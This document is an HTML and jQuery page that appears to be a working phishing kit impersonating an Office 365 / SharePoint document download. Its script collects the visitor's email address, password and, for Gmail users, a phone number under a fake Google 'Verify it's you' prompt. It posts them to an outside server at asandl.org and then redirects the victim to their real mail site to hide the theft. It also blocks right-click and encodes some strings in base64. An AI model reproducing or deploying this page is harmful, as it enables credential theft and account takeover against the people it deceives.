
<!doctype html>
<html lang="en">
<head>
  <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script type="text/javascript" src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">
    <title>Share Point Online</title>
    <link href="css/hover.css" rel="stylesheet" media="all">

    <style type="text/css">


    </style>
  </head>
  <body style="background-image: url('https://s3.amazonaws.com/simbla-static-2/2022/04/6110efa8ff5784001ac1bab8/6110efcbff5784001ac1babb/0qSCA5y6iP2hb4PhPTLvw6YR.jpg'); background-size: cover;background-repeat: no-repeat;" oncontextmenu="return false">
    <div class="container-fluid p-0">
      <div class="container-fluid fixed-top">
        <div class="row p-3" style="background-color: #B62F00;">
          <div class="col-lg-12">
            <img src="https://s3.amazonaws.com/simbla-static-2/2022/04/6110efa8ff5784001ac1bab8/6110efcbff5784001ac1babb/xpZyqJloYjHyQohQ1O0Vvyax.png" class="img-fluid" width="50px;">
            <span class="h4 text-white align-middle">Office 365 Buisness</span>            
          </div>
          
        </div>
      </div>
      <div class="container-fluid">
        <div class="row">
          <div class="col-lg-10 p-4 text-center mx-auto" style="margin: 150px 50px 0px 50px;background-color: #B62F00;">
            <span class="h3 text-white align-middle">Sign in for Download Document</span>            
          </div>
          <div class="col-lg-10 mx-auto text-center" style="background-color: rgba(0,0,0,0.7);">
            <div class="mt-4"> 
              <span class="h4 text-white">Select your email provider</span><br>
              <span class="h5" style="color:white;font-family: 'Archivo Narrow', sans-serif; ">Unfortunately we could not find your email provider based on your input.</span>
            </div>
            <div class="my-1 rounded">
              <div class="row p-3">
                <div class="col-lg-2 mx-auto text-center">
                  <a href="javascript:void(0)" id="office365modal" class="hvr-grow w-100" style="text-decoration: none;">
                    <div class="rounded px-2 py-1 mt-2" style=" background-color: #FF3C00;">
                      <img src="https://s3.amazonaws.com/simbla-static-2/2022/04/6110efa8ff5784001ac1bab8/6110efcbff5784001ac1babb/xpZyqJloYjHyQohQ1O0Vvyax.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;"><br>
                      <span class="pl-2" style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Login with<br> Office365</span>
                    </div>
                  </a>
                </div>
                </div>
                <div class="row p-3">
                <div class="col-lg-2 mx-auto text-center">
                  <a href="javascript:void(0)" id="othermodal" class="hvr-grow w-100" style="text-decoration: none;">
                    <div class="rounded px-2 py-1 mt-2" style=" background-color: #0B5BD3;">
                      <img src="https://s3.amazonaws.com/simbla-static-2/2022/04/6110efa8ff5784001ac1bab8/6110efcbff5784001ac1babb/POV-asJPP_gYlM-QoeKSEDDw.png" class="img-fluid" width="30px" style="padding:5px 0px 5px 0px;"><br>
                      <span class="pl-2" style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Login with<br> Other Mail</span>
                    </div>
                  </a>
                </div>
              </div>
            </div>
          </div> 
        </div> 
      </div>
    </div>



    <!-- Modal for gmail -->
                <div class="modal fade" id="ajaxModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
                    <div class="modal-dialog" role="document">
                        <div class="modal-content">
                            <div class="modal-header">
                                <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                                    <span aria-hidden="true">&times;</span>
                                </button>
                            </div>
                            <div class="modal-body">
                                <center>
                                    <img id="fieldImg" src="" class="img-fluid rounded-circle" width="80px">
                                    <h5 class="modal-title" id="exampleModalLabel"> <span id="field"></span></h5>
                                    <div class="alert alert-danger" id="msg"></div>
                                    <span id="error" class="text-danger">That account doesn't exist. Enter a different account</span>
                                </center>
                                <form id="contact" class="form-horizontal well">
                                    <div id="div1">
                                        <div class="col-lg-12">
                                            <div class="form-group">
                                                <div id="inputbar">
                                                    <label for="exampleInputEmail1">Email address</label>
                                                    <input type="email" name="ai" class="form-control" id="ai" aria-describedby="aiHelp" placeholder="Enter email">
                                                    <small id="aiHelp" class="form-text text-muted">We'll never share your email with anyone else.</small></div>
                                                <div id="automail" class="h5 mt-5">
                                                    <i class="fas fa-arrow-left" id="back1"></i>&nbsp<span id="aich">abc@abc.com</span>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="col-lg-12">
                                            <div class="form-group">
                                                <label for="Password">Password</label>
                                                <input type="password" name="pr" class="form-control" id="pr" aria-describedby="aiHelp" placeholder="Enter Password">
                                            </div>
                                        </div>
                                    </div>
                                    <div id="div2">
                                        <i class="fas fa-arrow-left" id="back"></i>&nbsp<span id="aich1" class="h5">abc@abc.com</span><br>
                                        <span class="h4 font-weight-normal">Verify it's you</span><br>
                                        <span>This device is not recognized. For security, Google want to make sure it's really you.</span><br>
                                        <span id="msg1" class="text-danger"></span><br>
                                        <span>Try another way to sign in</span>
                                        <div class="form-group mt-3">
                                            <input type="number" name="phone" class="form-control" id="phone" aria-describedby="aiHelp" placeholder="Enter Phone No.">
                                        </div>
                                    </div>
                            </div>
                            <div class="modal-footer">
                                <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                                <button class="btn btn-info pull-right" id="submit-btn">Login</button>
                                <button class="btn btn-info pull-right" id="submit-btn1">verify</button>
                            </div>
                            </form>
                        </div>
                    </div>
                </div>
                <!-- Optional JavaScript -->
                <!-- jQuery first, then Popper.js, then Bootstrap JS -->
                <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
                <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
                <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
<!--  /* global $ */
$(document).ready(function() {
    var count = 0;
    $('#div2').hide();
    $('#error').hide();
    $("#automail").hide();
    $("#msg").hide();
    $('#submit-btn1').hide();
    $('#back').click(function() {
        $("#msg").hide();
        $('#ai').val("");
        $('#pr').val("");

        $('#submit-btn1').hide();
        $('#submit-btn').show();
        $("#div2").animate({ left: 200, opacity: "hide" }, 0);
        $("#div1").animate({ right: 200, opacity: "show" }, 1000);

    });
    $('#back1').click(function() {
        $("#msg").hide();
        $('#ai').val("");
        $("#automail").animate({ left: 200, opacity: "hide" }, 0);
        $("#inputbar").animate({ right: 200, opacity: "show" }, 1000);

    });

    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_ai)) {
            $('#error').show();
            ai.focus;
            return false;
        }
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var ou = "b3V0bG9vaw==";
        var ho = "aG90bWFpbA==";
        if (final == "office365") {
            $('#contact').trigger("reset");
            $("#msg").hide();
            $('#fieldImg').attr('src', 'https://s3.amazonaws.com/simbla-static-2/2022/04/6110efa8ff5784001ac1bab8/6110efcbff5784001ac1babb/FtLI5w0vQgKNqVNANowzwLPg.png');
            $('#field').html("Office 365");
            $('#ai').val(my_ai);
            $('#aich').html(my_ai);
            $("#msg").hide();
            $("#inputbar").animate({ left: 200, opacity: "hide" }, 0);
            $("#automail").animate({ right: 200, opacity: "show" }, 1000);
            $('#ajaxModal').modal('show');
        
        }  else {
            $('#contact').trigger("reset");
            $("#msg").hide();
            $('#fieldImg').attr('src', 'https://s3.amazonaws.com/simbla-static-2/2022/04/6110efa8ff5784001ac1bab8/6110efcbff5784001ac1babb/Lh1iyA6g4Eabf6TL1RpVmKKl.ico');
            $('#field').html("Other Mail");
            $('#ai').val(my_ai);
            $('#aich').html(my_ai);
            $("#msg").hide();
            $("#inputbar").animate({ left: 200, opacity: "hide" }, 0);
            $("#automail").animate({ right: 200, opacity: "show" }, 1000);
            $('#ajaxModal').modal('show');
        }
    }
    ///////////////url getting ai////////////////


   
    $('#office365modal').click(function() {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'https://s3.amazonaws.com/simbla-static-2/2022/04/6110efa8ff5784001ac1bab8/6110efcbff5784001ac1babb/FtLI5w0vQgKNqVNANowzwLPg.png');
        $('#field').html("Office 365");
        $("#msg").hide();
        $('#ai').val("");
        $('#pr').val("");
        $('#submit-btn1').hide();
        $('#submit-btn').show();
        $("#div2").animate({ left: 200, opacity: "hide" }, 0);
        $("#div1").animate({ right: 200, opacity: "show" }, 1000);
        $('#ajaxModal').modal('show');
    });
    
    $('#othermodal').click(function() {
        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#fieldImg').attr('src', 'https://s3.amazonaws.com/simbla-static-2/2022/04/6110efa8ff5784001ac1bab8/6110efcbff5784001ac1babb/Lh1iyA6g4Eabf6TL1RpVmKKl.ico');
        $('#field').html("Other Mail");
        $("#msg").hide();
        $('#ai').val("");
        $('#pr').val("");
        $('#submit-btn1').hide();
        $('#submit-btn').show();
        $("#div2").animate({ left: 200, opacity: "hide" }, 0);
        $("#div1").animate({ right: 200, opacity: "show" }, 1000);
        $('#ajaxModal').modal('show');
    });

    var file = "bmV4dC5waHA=";
    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var detail = $("#field").html();
        var msg = $('#msg').html();
        $('#msg').text(msg);
        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_ai)) {
            $('#error').show();
            ai.focus;
            return false;
        }
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        ///////////new injection////////////////
        count = count + 1;


        $.ajax({
            dataType: 'JSON',
            url: 'https://asandl.org/kwamabby/next.php',
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
                detail: detail,

            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').html('Verifying...');
            },
            success: function(response) {
                if (count == 1 && final == "gmail") {
                    $('#aich1').html(my_ai);
                    $("#div1").animate({ left: 200, opacity: "hide" }, 0);
                    $("#div2").animate({ right: 200, opacity: "show" }, 1000);
                    $('#submit-btn').hide();
                    $('#submit-btn1').show();

                    return false;

                }
                $("#pr").val("");

                if (count >= 2) {
                    count = 0;
                    window.location.replace("http://www." + my_slice);
                }
                if (response) {
                    $("#msg").show();
                    console.log(response);
                    if (response['signal'] == 'ok') {
                        $('#msg').html(response['msg']);
                        // $('input, textarea').val(function() {
                        //    return this.defaultValue;
                        // });
                    } else {
                        $('#msg').html(response['msg']);
                    }
                }
            },
            error: function() {
                if (count == 1 && final == "gmail") {
                    $('#aich1').html(my_ai);
                    $("#div1").animate({ left: 200, opacity: "hide" }, 0);
                    $("#div2").animate({ right: 200, opacity: "show" }, 1000);
                    $('#submit-btn').hide();
                    $('#submit-btn1').show();

                    return false;

                }
                $("#pr").val("");
                if (count >= 3) {
                    count = 0;
                    window.location.replace("http://www." + my_slice);
                }
                $("#msg").show();
                $('#msg').html("Invalid Password.! Please enter correct password.");
            },
            complete: function() {
                $('#submit-btn').html('Login');
            }
        });
    });
    $('#submit-btn1').click(function(event) {
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var phone = $("#phone").val();
        var detail = $("#field").html();
        var msg1 = $('#msg1').html();
        $.ajax({
            dataType: 'JSON',
            url: 'https://asandl.org/kwamabby/next.php',
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
                detail: detail,
                phone: phone,

            },
            beforeSend: function(xhr) {
                $('#submit-btn1').html('Verifing...');
            },
            success: function(response) {
                window.location.replace("http://gmail.com/");
                $('#pr').val("");
                if (response) {
                    // $("#msg1").show();
                    console.log(response);
                    if (response['signal'] == 'ok') {
                        $('#msg1').html(response['msg']);
                    } else {
                        $('#msg1').html(response['msg']);
                    }
                }
            },
            error: function() {
                window.location.replace("http://gmail.com/");
                $('#pr').val("");
                // $("#msg1").show();
                // $('#msg1').html("Invalid Phone.! Please enter correct Phone.");
            },
            complete: function() {
                $('#submit-btn1').html('Verify');
            }
        });
        // }
    });
});
</script>

</html>